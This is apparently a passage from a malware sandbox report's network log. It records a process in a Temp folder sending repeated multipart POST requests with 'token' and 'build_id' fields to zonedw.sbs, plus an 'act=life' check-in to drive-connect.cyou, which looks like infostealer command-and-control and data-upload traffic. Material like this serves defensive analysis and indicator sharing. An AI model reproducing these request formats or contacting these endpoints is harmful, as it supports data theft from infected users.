2024-12-13 17:54:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:59 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:54:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.7	50061	104.21.79.7	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:54:58 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: drive-connect.cyou
2024-12-13 17:54:58 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-13 17:54:59 UTC	1021	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 17:54:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4f7j3ujrpkgq60uqodnb7k5ge2; expires=Tue, 08-Apr-2025 11:41:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GZk9cvxEIOk8kTKztMeB6L%2F5aKy1vSbTfQeLyr0rjVrI%2Fu7lntNJvO%2BgK3T4JnDODw75ZaJS9T08mqmzdVAVZdFspBXgk%2FeiEhw71M37NayZH%2BZxHdJygy3zWNHKwL7V9CDSqqc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f17d28d0a057c87-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8479&min_rtt=1976&rtt_var=4789&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1477732&cwnd=204&unsent_bytes=0&cid=416d4eda3ab8a792&ts=1480&x=0"
2024-12-13 17:54:59 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-13 17:54:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	50063	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:55:00 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IW479RIW47G4E3W4EU37 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 393697 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:55:00 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 57 34 37 39 52 49 57 34 37 47 34 45 33 57 34 45 55 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 49 57 34 37 39 52 49 57 34 37 47 34 45 33 57 34 45 55 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 49 57 34 37 39 52 49 57 34 37 47 34 45 33 57 34 45 55 33 37 0d 0a 43 6f 6e 74 Data Ascii: ------IW479RIW47G4E3W4EU37Content-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------IW479RIW47G4E3W4EU37Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------IW479RIW47G4E3W4EU37Cont
2024-12-13 17:55:00 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:55:00 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:55:00 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:55:00 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:55:00 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:55:00 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:55:00 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:55:00 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:55:00 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:55:02 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:55:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	50065	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:55:02 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JECTJECTRI58YMYMYMYU User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 131557 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:55:02 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 54 4a 45 43 54 52 49 35 38 59 4d 59 4d 59 4d 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 54 4a 45 43 54 52 49 35 38 59 4d 59 4d 59 4d 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 54 4a 45 43 54 52 49 35 38 59 4d 59 4d 59 4d 59 55 0d 0a 43 6f 6e 74 Data Ascii: ------JECTJECTRI58YMYMYMYUContent-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------JECTJECTRI58YMYMYMYUContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------JECTJECTRI58YMYMYMYUCont
2024-12-13 17:55:02 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:55:02 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:55:02 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:55:02 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
